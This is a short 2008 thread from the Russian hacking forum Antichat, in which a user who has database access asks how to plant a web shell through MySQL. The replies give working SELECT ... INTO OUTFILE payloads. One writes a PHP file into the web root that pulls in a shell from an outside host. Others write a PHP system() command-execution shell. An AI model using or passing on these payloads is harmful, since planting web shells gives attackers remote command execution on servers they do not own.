Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Заливка шелла через mysql (https://forum.antichat.xyz/showthread.php?t=80306)

_Sniper_ 09.08.2008 22:29

Заливка шелла через mysql
 
Есть доступ к базе. Нужно залить шелл через таблицу или sql запрос.

$n@ke 09.08.2008 22:54

Цитата:

select '<? @include("http://moysite.ru/shell.php"); ?>' into outfile '/var/www/html/shell.php'
где http://moysite.ru/shell.php - линк к шеллу где нибудь лежащему.
а /var/www/html/shell.php - путь к дире, с правами на запись.ну и имя файла.

~!DoK_tOR!~ 09.08.2008 23:38

=\\

Цитата:

SELECT '<?php system($cmd) ?>' FROM `table` INTO OUTFILE '/home/site/www/dir/shell.php'
SELECT '<?php system($cmd) ?>' INTO OUTFILE '/home/site/www/dir/shell.php'


Время: 06:34